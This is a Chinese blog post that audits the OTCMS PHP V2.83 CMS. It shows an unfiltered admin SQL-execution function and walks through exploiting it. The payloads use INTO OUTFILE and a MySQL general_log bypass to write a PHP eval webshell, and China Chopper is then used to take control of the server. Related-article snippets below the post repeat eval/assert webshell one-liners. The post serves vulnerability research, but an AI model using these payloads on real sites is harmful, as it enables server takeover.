【代码审计】OTCMS_PHP_V2.83_代码执行漏洞分析

最新推荐文章于 2024-01-20 19:07:04 发布
最新推荐文章于 2024-01-20 19:07:04 发布
阅读量859 收藏 1
点赞数
分类专栏: 【PHP 代码审计】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/84967433
版权

 

0x00 环境准备

OTCMS官网:http://otcms.com

网站源码版本:网钛CMS PHP版 V2.83 [更新于2017.12.31]

程序源码下载:http://d.otcms.com/php/OTCMS_PHP_V2.83.rar

测试网站首页:

 

0x01 代码分析

1、漏洞文件地址:/admin/sysCheckFile_deal.php  第523--540行:  

  1.  function SqlDeal(){  
  2.     global $DB,$skin,$mudi,$menuFileID,$menuTreeID;  
  3.   
  4.     $backURL        = OT::PostStr('backURL');  
  5.     $sqlContent     = OT::PostStr('sqlContent');  
  6.   
  7.     if (strlen($sqlContent) == 0){  
  8.         JS::AlertBackEnd('SQL语句不能为空.');  
  9.     }  
  10. 10.   
  11. 11.     $judRes = $DB->query($sqlContent);  
  12. 12.         if ($judRes){  
  13. 13.             $alertResult = '成功';  
  14. 14.         }else{  
  15. 15.             $alertResult = '失败';  
  16. 16.         }  
  17. 17.   
  18. 18.     JS::AlertHrefEnd('执行'. $alertResult .'', $backURL);  
  19. 19.   

20. }  

这段函数中,首先进行接收参数,判断sqlContent是否为空,然后带入到数据库中执行,根据返回结果判断语句是否执行成功。可以看到参数并未进行任何过滤或处理,导致程序在实现上存在代码执行漏洞,攻击者可以构造SQL语句写入脚本代码,进一步触发代码执行,控制网站服务器权限。

0x02 漏洞利用

1、登录后台,首先通过数据库备份功能获取网站物理路径:

 

2、访问漏洞地址,构造SQL语句进行文件写操作

漏洞URL:http://127.0.0.1/admin/sysCheckFile.php?mudi=sql

Payload:

  1. select '<?php eval($_POST[g]);?>' into outfile 'e:/study/WWW/otcms/Data_backup/1.php' 

执行失败,程序在into outfile进行限制了。

3、如何绕过这种限制?

构造SQL语句利用日志写入文件:

  1. Payload:
  2. set global general_log = on;    #开启general log模式  
  3. set global general_log_file = 'e:/study/WWW/otcms/Data_backup/1.php'; #设置日志目录为shell地址  
  4. select '<?php eval($_POST[g]);?>'  #写入shell  

 

4、成功触发脚本代码

 

 

5、通过菜刀连接,获取网站服务器控制权限

 

 

0x03 修复建议

1、Mysql数据库降权处理,让入侵者无法做高权限下可做的事!

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

 

 

Bypass--
关注
专栏目录
[zkaq靶场]代码执行--DouPHP-v1.5漏洞
wwxxee
05-10 1033
代码执行 相关函数与语句 eval():会将字符串当作代码执行。 <?php @eval($_REQUEST["code"])?> 单双引号输出问题: assert():如果传入字符串会被当做PHP代码执行 <?php @assert($_REQUEST["code"])?> 与eval的区别:eval可以执行多行,而assert只能执行一行。 当assert想要执行多行时,可以利用写文件的方式: file_put_contents("123.php","<?php
OT_02779 OTCMS_SQL_5.52_20150706
12-19
&quot;OT_02779 OTCMS_SQL_5.52_20150706&quot;这个标题暗示了我们正在处理一个特定版本的OTCMSOT Counter Management System)数据库软件,版本号为5.52,发布日期为2015年7月6日。OTCMS可能是一个用于零售、餐饮或服务业的...
php 漏洞,文章管理系统(OTCMS)2.84 SQL注射漏洞
weixin_30064143的博客
04-04 722
漏洞作者: 语邑尘文章管理系统(OTCMS)2.84 的 rss.asp 存在注入漏洞。可获取管理员及密码。因密码经过两次CMD5加密,危害较小。问题代码:[php]typeStr = Trim(request.querystring("typeStr"))maxNum = Trim(request.querystring("maxNum"))typeWhereStr = ""typeTitl...
Douphp cms通杀漏洞(小宇特详解)
小宇的web博客
11-15 5543
Douphpcms通杀漏洞 老规矩在分析cms漏洞时,先在本机上安装cms,来进行代码审计。 这个通杀漏洞的原理就是通过找到data文件中的unlink文件进行删除,然后进行重新安装这个站点,然后我们对他进行恶意的传参,然后我拿到这个站点的webshell。 这个靶场是通过cms进行搭建的,我们事先在本地搭建一个 安装成功过后我们进行代码审计然后我们进行全局变量搜索,搜索函数unlink. 然后查找我们可以进行控制的地方,即控制它的传参变量 我们再这里找到了sql_filename这个变量,进去查看
代码审计】DouPHP_v1.3代码执行漏洞分析
12-03 2527
  0x00 环境准备 DouPHP:http://www.douco.com/ 程序源码下载:http://down.douco.com/DouPHP_1.3_Release_20171002.rar 测试站首页:   0x01 代码分析 1、文件位置: /admin/module.php 第64-77行中: if ($rec == 'install') { ...
文章管理系统(OTCMS) 2.92源码
php源码
01-20 222
文章管理系统(OTCMS)不但可以适用于广泛的新闻发布型站,还适用于淘宝客站,后续工作室将会扩展功能,但不会往功能全面方向发展,只会往功能通用、操作简单的方向发展,让不懂代码但又想建立自己站的朋友,使用文章管理系统,通过后台简单的配置,就能拥有一个个性化的自己的站。 1.[改变]后台登陆页 “登陆”按钮文字改为“登录”; 2.[修复]修复文件操作的细节BUG; 3.[改进]采集增加对https协议的支持。 下载地址: http://www.bytepan.com/ymeC1qSVzTU
CMS(OTCMS) PHP版 5.21
04-10
CMS(OTCMS)PHP版以简单、实用、傻瓜式操作而闻名,无论在功能,人性化,还是易用性方面,都有了长足的发展,CMS的主要目标用户锁定在中小型站站长,让那些对络不是很熟悉,对站建设不是很懂又想做站...
(OTCMS)CMS PHPv2.41
11-30
CMS(OTCMS) PHP版 基于PHP+sqlite/mysql的技术架构,UTF-8编码,不但可以适用于广泛的新闻/文章发布型站,还适用于资讯门户类站,让不懂代码但又想建立自己站的朋友,使用
CMS PHPv2.83
12-08
CMS(OTCMS) PHP版 基于PHP+sqlite/mysql的技术架构,UTF-8编码,不但可以适用于广泛的新闻/文章发布型站,还适用于资讯门户类站,让不懂代码但又想建立自己站的朋友,使用
archive_ 文章管理系统(OTCMS) v2.93 [江西新余电信].zip.zip
09-14
OTCMS v2.93 是其特定的一个版本,针对的是江西新余电信的服务环境。这个系统的出现,旨在帮助用户更高效、便捷地管理他们的在线内容,包括文章的创建、编辑、分类、搜索以及发布等功能。 首先,我们来看看OTCMS的...
PHP的SQL注入实现(测试代码安全不错)
10-28
看黑客是如何入侵的,我们写编写php代码的过程中,最好自己先测试效果。
CMS(OTCMS) PHP版 5.80
04-30
CMS(OTCMS)PHP版以简单、实用、傻瓜式操作而闻名,无论在功能,人性化,还是易用性方面,都有了长足的发展,CMS的主要目标用户锁定在中小型站站长,让那些对络不是很熟悉,对站建设不是很懂又想做站的人能很快搭建起一个功能实用又强大,操作人性又易用。CMS(OTCMS) PHP版 5.80 更新日志:2021-01-3101.[新增]增加对站内信息 插件的支持;02.[新增]管理员专区→后台参数配置新增提示待处理信息频率/范围(会员投稿未审核文章、举报未阅读记录、站内信息未阅读、积分商城有新订单 后台会标题提示和提示音响起);03.[新增]后台界面页头增加定时提示待处理信息 显示区,可附带是否开启提示音;04.[新增]重置大小写表脚本加入到后台,管理员专区→程序文件检查-[获取数据库结构];05.[改变]前台注册用户名汉字改为占2字节,最多可以填8个汉字;06.[插件]会员管理→会员参数设置,会员登录/注册 新增 邀请人信息项,开启,会员注册时如果有通过邀请链接进来会显示邀请人的用户名(需要 邀请分销 插件支持);07.[插件]后台新增/修改会员,增加推荐人编辑框;08.[插件]邀请好友 插件,升级为邀请注册&分销 插件,最多支持二级分销,会员中心,邀请好友,菜单,增加团队1级和2级人数和名单列表;09.[插件]前台会员中心-邀请好友,邀请链接,增加二维码模式和带有二维码的海报模式(海报图片要自己设计上替换系统默认图片即可);10.[插件]常规设置→插件参数设置,会员类,新增邀请分销抽成和邀请抽成范围(用户注册、在线充值);11.[插件]后台会员管理→文章浏览记录,增加删除几天前所有记录功能(需要文章浏览记录,插件支持);12.[插件]后台会员管理→文章收藏记录,增加删除几天前所有记录功能(需要文章收藏记录,插件支持);13.[插件]后台会员管理→文章下载记录,增加删除几天前所有记录功能(需要文章下载记录,插件支持);14.[插件]后台常规设置→举报管理,增加状态信息(已阅/未阅),以及全部设为已阅按钮(需要举报模块,插件支持);15.[插件]后台采集管理→采集项目管理,纯静态路径前提下,底部会有生成静态页,按钮,打钩采集时会采集完一篇生成这篇内容静态页;16.修复几处细节BUG。
代码审计之_douphp20190711漏洞
whojoe的博客
04-12 1858
douphp20190711代码审计漏洞复现douphp20190711代码审计漏洞复现1.安装时参数控制不严谨getshell1.1 审计过程1.2 分析漏洞2.后台任意文件删除3.遇到的坑3.1 对于文件上传进行审计3.2对于账户登录的记录的ip是否可注入的猜测4.总结4.总结 douphp20190711代码审计漏洞复现 下载链接http://down.douco.com/DouPHP...
漏洞复现之DouPHP_v1.5_Release_20190711cms代码执行漏洞的利用与防御
seek_2022的博客
03-23 6136
文章目录一、代码执行漏洞简介二、DouPHP简介三、PHP双引号的高级用法四、代码审计寻找代码执行漏洞(一)寻找存在代码执行漏洞的点(二)寻找可利用的unlink函数(三)利用代码执行漏洞getshell五、DOUPHP代码执行漏洞总结及防御建议 本文根据上公开的DOUPHP中安装页面存在的代码执行漏洞进行了代码审计漏洞复现,并据此提出了针对该漏洞的防御建议。 一、代码执行漏洞简介 RCE(remote command/code execute)命令执行或者代码执行。RCE的原理是用户输入的数据被当做
DouPHP靶场代码审计漏洞复现
qq_59023242的博客
12-21 1356
修改文件路径。
php轻量级个人企业,DouPHP轻量级企业建站系统任意文件下载源码漏洞
weixin_35330534的博客
03-17 181
### 简要描述:任意文件下载,漏洞文件:admin/backup.php可以下载整站文件源码,官测试站通过。### 详细说明:漏洞文件admin/backup.php第187行开始。/**+----------------------------------------------------------* 备份下载+--------------------------------------...
ssrf漏洞代码审计之douphp解析(超详细)
最新发布
qq_59020256的博客
01-20 1001
由此可知安装界面已经被锁定了,但是由于install.lock是可控的,删除了install.lock后即可进行安装,所以我们现在的目的就是找到怎么去删除install.lock的方法。存在变量$sql_filename,且$sql_filename这个变量输出参数时要被is_backup_file处理,所以鼠标右键定位函数is_backup_file后进行查询。我们需要将/m/theme/default/images/logo.png变为/data/install.lock。
DouPHP v1.5 任意文件删除+远程代码执行复现
weixin_51681694的博客
04-18 332
往上走,是一个sql查询语句,将字段名name=mobile_logo的value值取出赋值给$mobile_logo。利用任意文件删除删除data/install.lock,此时页面会回到安装页面,再写入木马即可。由于是往数据库中取得,需要看看其他地方有没有sql注入,或者是现成的update。远程代码执行在安装点,当安装界面填入相应数据时,数据会被放入双引号中执行。接下来就简单了,按代码意思不过上面的代码块,直接修改原参。这里的post传参键值分离,一一插入数据库中。可惜的是数据库中的值并没有改变。
php 轻量级后台,DouPHP轻量级企业建站系统后台任意文件删除缺陷
weixin_35271253的博客
03-17 246
### 简要描述:某处未验证删除的文件路径,导致可以删除任意文件。官演示站测试通过### 详细说明:漏洞文件: /admin/backup.php第161行```/**+----------------------------------------------------------* 备份删除+-------------------------------------------------...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值